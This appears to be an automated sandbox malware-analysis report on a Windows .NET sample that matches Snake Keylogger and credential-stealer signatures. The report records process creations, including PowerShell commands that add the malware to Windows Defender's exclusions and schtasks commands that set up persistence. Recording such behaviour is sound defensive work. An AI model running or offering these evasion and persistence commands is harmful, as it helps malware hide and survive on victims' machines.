Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_04FE2FB8	11_2_04FE2FB8
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_04FE0F50	11_2_04FE0F50
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_04FE2B90	11_2_04FE2B90
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_04FE1388	11_2_04FE1388
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_04FE0B18	11_2_04FE0B18
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 16_2_02D9D278	16_2_02D9D278
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 16_2_02D95370	16_2_02D95370
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 16_2_02D9A088	16_2_02D9A088
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 16_2_02D9C147	16_2_02D9C147
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 16_2_02D9C738	16_2_02D9C738
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 16_2_02D9C468	16_2_02D9C468
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 16_2_02D9CA08	16_2_02D9CA08
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 16_2_02D9E988	16_2_02D9E988
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 16_2_02D969A0	16_2_02D969A0
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 16_2_02D93E09	16_2_02D93E09
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 16_2_02D96FC8	16_2_02D96FC8
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 16_2_02D9CFA9	16_2_02D9CFA9
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 16_2_02D9CCD8	16_2_02D9CCD8
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 16_2_02D93AA1	16_2_02D93AA1
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 16_2_02D939ED	16_2_02D939ED
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 16_2_02D929EC	16_2_02D929EC
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 16_2_02D9E97B	16_2_02D9E97B
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 16_2_02D9F961	16_2_02D9F961

Source: VSVy.exe, 00000000.00000002.2248768880.0000000009CF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs VSVy.exe
Source: VSVy.exe, 00000000.00000002.2244413359.0000000004162000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs VSVy.exe
Source: VSVy.exe, 00000000.00000002.2243342414.00000000028A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs VSVy.exe
Source: VSVy.exe, 00000000.00000002.2243490956.0000000002B97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs VSVy.exe
Source: VSVy.exe, 00000000.00000002.2249312439.000000000B328000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs VSVy.exe
Source: VSVy.exe, 00000000.00000002.2241745741.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs VSVy.exe
Source: VSVy.exe, 00000000.00000002.2248768880.0000000009CC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs VSVy.exe
Source: VSVy.exe, 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs VSVy.exe
Source: VSVy.exe, 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs VSVy.exe
Source: VSVy.exe, 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs VSVy.exe
Source: VSVy.exe, 0000000A.00000002.3899728061.0000000000BF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs VSVy.exe

Source: VSVy.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 10.2.VSVy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.VSVy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.VSVy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.gJfOOh.exe.3999390.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.gJfOOh.exe.3955570.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.gJfOOh.exe.3999390.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.gJfOOh.exe.3955570.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.gJfOOh.exe.3999390.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.gJfOOh.exe.3955570.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.VSVy.exe.41a5dc0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.VSVy.exe.41a5dc0.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000A.00000002.3899379184.0000000000425000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: VSVy.exe PID: 764, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: VSVy.exe PID: 6208, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: gJfOOh.exe PID: 4160, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: VSVy.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: gJfOOh.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, -O-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, -O-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, -O-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, -O-.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, S6q8GFqt3n1GOBenTk.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, S6q8GFqt3n1GOBenTk.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, S6q8GFqt3n1GOBenTk.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, S6q8GFqt3n1GOBenTk.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, S6q8GFqt3n1GOBenTk.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, S6q8GFqt3n1GOBenTk.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, gcOGR2CVZ5gWDXuqnV.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, gcOGR2CVZ5gWDXuqnV.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, S6q8GFqt3n1GOBenTk.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, S6q8GFqt3n1GOBenTk.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, S6q8GFqt3n1GOBenTk.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, gcOGR2CVZ5gWDXuqnV.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, gcOGR2CVZ5gWDXuqnV.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, gcOGR2CVZ5gWDXuqnV.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, gcOGR2CVZ5gWDXuqnV.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@21/15@4/4

Source: C:\Users\user\Desktop\VSVy.exe

File created: C:\Users\user\AppData\Roaming\gJfOOh.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6668:120:WilError_03
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Mutant created: \Sessions\1\BaseNamedObjects\FIpBPWSxHGNpkuPkADh
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5264:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5032:120:WilError_03

Source: C:\Users\user\Desktop\VSVy.exe

File created: C:\Users\user\AppData\Local\Temp\tmp337E.tmp

Jump to behavior

Source: VSVy.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: VSVy.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\VSVy.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\VSVy.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: VSVy.exe	ReversingLabs: Detection: 32%
Source: VSVy.exe	Virustotal: Detection: 36%

Source: C:\Users\user\Desktop\VSVy.exe

File read: C:\Users\user\Desktop\VSVy.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\VSVy.exe "C:\Users\user\Desktop\VSVy.exe"
Source: C:\Users\user\Desktop\VSVy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VSVy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJfOOh.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VSVy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp337E.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VSVy.exe	Process created: C:\Users\user\Desktop\VSVy.exe "C:\Users\user\Desktop\VSVy.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\gJfOOh.exe C:\Users\user\AppData\Roaming\gJfOOh.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp7F3D.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process created: C:\Users\user\AppData\Roaming\gJfOOh.exe "C:\Users\user\AppData\Roaming\gJfOOh.exe"
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process created: C:\Users\user\AppData\Roaming\gJfOOh.exe "C:\Users\user\AppData\Roaming\gJfOOh.exe"
Source: C:\Users\user\Desktop\VSVy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJfOOh.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp337E.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process created: C:\Users\user\Desktop\VSVy.exe "C:\Users\user\Desktop\VSVy.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp7F3D.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process created: C:\Users\user\AppData\Roaming\gJfOOh.exe "C:\Users\user\AppData\Roaming\gJfOOh.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process created: C:\Users\user\AppData\Roaming\gJfOOh.exe "C:\Users\user\AppData\Roaming\gJfOOh.exe"	Jump to behavior

Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
